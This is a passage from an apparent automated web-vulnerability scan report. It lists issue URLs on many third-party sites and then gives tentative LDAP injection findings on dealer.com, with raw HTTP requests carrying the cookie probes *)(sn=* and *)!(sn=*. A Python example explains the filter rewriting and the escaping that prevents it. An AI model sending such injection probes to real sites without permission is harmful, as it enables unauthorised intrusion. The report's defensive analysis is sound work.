4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]

4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]

4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]

4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]

4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]

4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]

4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]

4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]

4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]

4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]

4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]

4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]

4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]

4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]

4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]

4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]

4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]

4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]

4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]

4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]

4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]

4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]

4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]

4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]

4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]

5. Flash cross-domain policy

5.1. http://cspix.media6degrees.com/crossdomain.xml

5.2. http://images.dealer.com/crossdomain.xml

5.3. http://pictures.dealer.com/crossdomain.xml

5.4. http://pixel.33across.com/crossdomain.xml

5.5. http://static.dealer.com/crossdomain.xml

5.6. http://videos.dealer.com/crossdomain.xml

5.7. http://videos2.dealer.com/crossdomain.xml

5.8. http://mt0.google.com/crossdomain.xml

6. Silverlight cross-domain policy

7. Cleartext submission of password

7.1. http://community.martindale.com/groups/groupdirectory.aspx

7.2. http://community.martindale.com/upgrade-your-connected-account.aspx

7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

7.4. http://www.100zakladok.ru/save/

7.5. http://www.2linkme.com/

7.6. http://www.adifni.com/account/bookmark/

7.7. http://www.adifni.com/account/bookmark/

7.8. http://www.arto.com/section/user/login/

7.9. http://www.auditmypc.com/firewall-test.asp

7.10. http://www.bookmark.it/bookmark.php

7.11. http://www.bookmark.it/bookmark.php

7.12. http://www.bookmerken.de/

7.13. http://www.brainify.com/Bookmark.aspx

7.14. http://www.cirip.ro/post/

7.15. http://www.classicalplace.com/

7.16. http://www.colivia.de/login.php

7.17. http://www.colivia.de/submit.php

7.18. http://www.diglog.com/submit.aspx

7.19. http://www.drimio.com/drimthis/index

7.20. http://www.embarkons.com/sharer.php

7.21. http://www.embarkons.com/sharer.php

7.22. http://www.embarkons.com/sharer.php/a

7.23. http://www.embarkons.com/sharer.php/a

7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.30. http://www.embarkons.com/sharer.php/images/search-con.gif

7.31. http://www.embarkons.com/sharer.php/images/search-con.gif

7.32. http://www.embarkons.com/sharer.php/src/captcha.php

7.33. http://www.embarkons.com/sharer.php/src/captcha.php

7.34. http://www.ezyspot.com/submit

7.35. http://www.forceindya.com/submit

7.36. http://www.fulbright.com/

7.37. http://www.fulbright.com/index.cfm

7.38. http://www.fulbright.com/insite

7.39. http://www.fulbright.com/insite

7.40. http://www.gabbr.com/login/

7.41. http://www.gabbr.com/submit/

7.42. http://www.gamekicker.com/node/add/drigg

7.43. http://www.imera.com.br/post_d.html

7.44. http://www.influx.com.br/

7.45. http://www.jamespot.com/

7.46. http://www.jumptags.com/add/

7.47. http://www.librerio.com/inbox

7.48. http://www.linkagogo.com/go/AddNoPopup

7.49. http://www.livejournal.com/update.bml

7.50. http://www.longislanderotic.com/longislanderotic/forum/

7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp

7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp

7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp

7.54. http://www.martindale.com/ContactUs.aspx

7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm

7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm

7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm

7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm

7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm

7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm

7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm

7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm

7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm

7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm

7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm

7.66. http://www.martindale.com/all/c-england/all-lawyers.htm

7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html

7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html

8. SSL cookie without secure flag set

8.1. https://auctions.godaddy.com/

8.2. https://cc.dealer.com/views/login

8.3. https://community.qualys.com/docs/DOC-1542

8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll

8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

8.6. https://home.mcafee.com/secure/cart/

8.7. https://home3.ca.com/Login2.aspx

8.8. https://myaccount.bitdefender.com/site/MyAccount/login/

8.9. https://secure.eset.com/us/store/geoIpRedirect

8.10. https://secure.opinionlab.com/ccc01/comment_card.asp

8.11. https://www.box.net/api/1.0/import

8.12. https://www.fathomseo.com/

8.13. https://www.godaddy.com/domains/popups/icannfee.aspx

8.14. https://www.trendsecure.com/my_account/signin/login

8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

8.16. https://cc.dealer.com/views/forgot-password

8.17. https://cc.dealer.com/views/login

8.18. https://www.godaddy.com/gdshop/registrar/search.asp

8.19. https://www.mcafeesecure.com/RatingVerify

8.20. https://www.paypal.com/cgi-bin/webscr

9. Session token in URL

9.1. http://aolproductcentral.aol.com/ClickBroker

9.2. https://aolproductcentral.aol.com/control/additem

9.3. http://bh.contextweb.com/bh/set.aspx

9.4. http://cc.dealer.com/views/login

9.5. http://cc.dealer.com/views/login

9.6. https://cc.dealer.com/views/login

9.7. http://fls.doubleclick.net/activityi

9.8. http://l.sharethis.com/pview

9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard

9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard

9.12. http://www.amazon.com/gp/product/0975264001

9.13. http://www.dzone.com/links/add.html

9.14. http://www.facebook.com/extern/login_status.php

9.15. http://www.hldataprotection.com/

9.16. http://www.pages05.net/WTS/event.jpeg

9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html

10. ASP.NET ViewState without MAC enabled



1. LDAP injection
There are 12 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws are often unreliable and prone to false positives. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the instances below, each pair of probes returned the same 404 page, and the two responses differ only in the rotating testimonial quotes and ad carousel order (and hence in Content-Length), which is consistent with randomised page content rather than with a change in the logic of a back-end query. Every instance is therefore reported at Tentative confidence and should be treated as unconfirmed until a probe produces a response that cannot be explained by that rotation.
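To make the scanner's reasoning concrete, the following added example (not from the XSS.CX report or from Burp Suite) shows what the two probe payloads quoted in this section, *)(sn=* and *)!(sn=*, do to an LDAP search filter when a cookie value is concatenated into it, and why RFC 4515 escaping neutralises them. The filter template, the objectClass and pageVisit attribute names, and the idea that the application looks visitors up by page-visit cookie are assumptions made for illustration only; nothing on the page shows that dealer.com performs any LDAP query at all.

```python
"""
Added example (not from the XSS.CX report or from Burp Suite): how the
probe payloads *)(sn=* and *)!(sn=* rewrite an LDAP filter when a cookie
value is spliced into it, and how RFC 4515 escaping prevents that.
Filter template and attribute names are illustrative assumptions.
"""

# RFC 4515 section 3: inside an assertion value these characters must be
# written as a backslash followed by the two-digit hex code of the byte.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied string for use as an LDAP filter assertion value."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_filter(page_visit: str) -> str:
    """Hypothetical vulnerable lookup: the cookie value is concatenated straight in."""
    return f"(&(objectClass=visitor)(pageVisit={page_visit}))"


def safe_filter(page_visit: str) -> str:
    """The same lookup with the value escaped before it enters the filter."""
    return f"(&(objectClass=visitor)(pageVisit={escape_filter_value(page_visit)}))"


class FilterSyntaxError(ValueError):
    """Raised when a filter string is not well-formed under RFC 4515."""


def parse_filter(text: str):
    """Parse a filter into nested tuples or raise FilterSyntaxError.

    Compound filters become ("&"|"|"|"!", [children]); simple equality
    assertions become ("=", attribute, value). Other match types are not
    needed for this demonstration.
    """
    node, pos = _parse(text, 0)
    if pos != len(text):
        raise FilterSyntaxError(f"trailing data at offset {pos}")
    return node


def _parse(s: str, i: int):
    if i >= len(s) or s[i] != "(":
        raise FilterSyntaxError(f"expected '(' at offset {i}")
    i += 1
    if i >= len(s):
        raise FilterSyntaxError("unterminated filter")
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if i >= len(s) or s[i] != ")":
            # The second probe lands here: a bare "!" where only "(" or ")"
            # may appear, so a real directory would reject the whole filter.
            raise FilterSyntaxError(f"expected ')' at offset {i}")
        return (op, children), i + 1
    if s[i] == "!":
        child, i = _parse(s, i + 1)
        if i >= len(s) or s[i] != ")":
            raise FilterSyntaxError(f"expected ')' at offset {i}")
        return ("!", [child]), i + 1
    end = s.find(")", i)
    if end == -1:
        raise FilterSyntaxError("unterminated assertion")
    item = s[i:end]
    if "=" not in item or "(" in item:
        raise FilterSyntaxError(f"malformed assertion {item!r}")
    attribute, value = item.split("=", 1)
    return ("=", attribute, value), end + 1


def differential_probe(build_filter):
    """Replay the scanner's paired probe against a filter builder.

    A vulnerable conjunctive query accepts the first payload (it merely gains
    an extra assertion) and chokes on the second, so the two responses differ.
    Returns {payload: ("ok", number_of_assertions) | ("error", message)}.
    """
    outcome = {}
    for payload in ("*)(sn=*", "*)!(sn=*"):
        try:
            tree = parse_filter(build_filter(payload))
            outcome[payload] = ("ok", len(tree[1]))
        except FilterSyntaxError as exc:
            outcome[payload] = ("error", str(exc))
    return outcome


if __name__ == "__main__":
    for name, build in (("vulnerable", vulnerable_filter), ("escaped", safe_filter)):
        for payload, result in differential_probe(build).items():
            print(f"{name:10s} {payload:9s} -> {build(payload):50s} {result}")
```

Against the vulnerable builder the first payload parses as a valid filter with three assertions (the injected (sn=*) now matches every entry with a surname) while the second raises a syntax error, which is exactly the asymmetry the scanner looks for; against the escaped builder both payloads parse as a single literal pageVisit assertion and the responses would be identical. The scanner cannot see the filter, only the HTTP response, so when both responses are the same 404 with rotating content, as in this report, the asymmetry has not been demonstrated.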



1.1. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie. The two requests produced different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19816
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003257; expires=Mon, 16-Apr-2012 01:20:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertisin
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)!(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20064
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mar
...[SNIP]...

1.2. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.

The payloads b330b37b000bf702)(sn=* and b330b37b000bf702)!(sn=* were each submitted in the exp_last_activity cookie. The two requests produced different responses, which may indicate that the input is incorporated into a disjunctive LDAP query in an unsafe manner.

Note that in both responses below the application echoes the submitted exp_last_activity value back, URL-encoded, in a Set-Cookie header for exp_last_visit (b330b37b000bf702%29%28sn%3D%2A and b330b37b000bf702%29%21%28sn%3D%2A). This shows that the cookie value is stored and re-emitted without validation, but it is not by itself evidence that the value reaches an LDAP query.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20004
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtil
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)!(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20158
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:00 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%21%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/
Set-Cookie: exp_last_activity=1303003679; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/

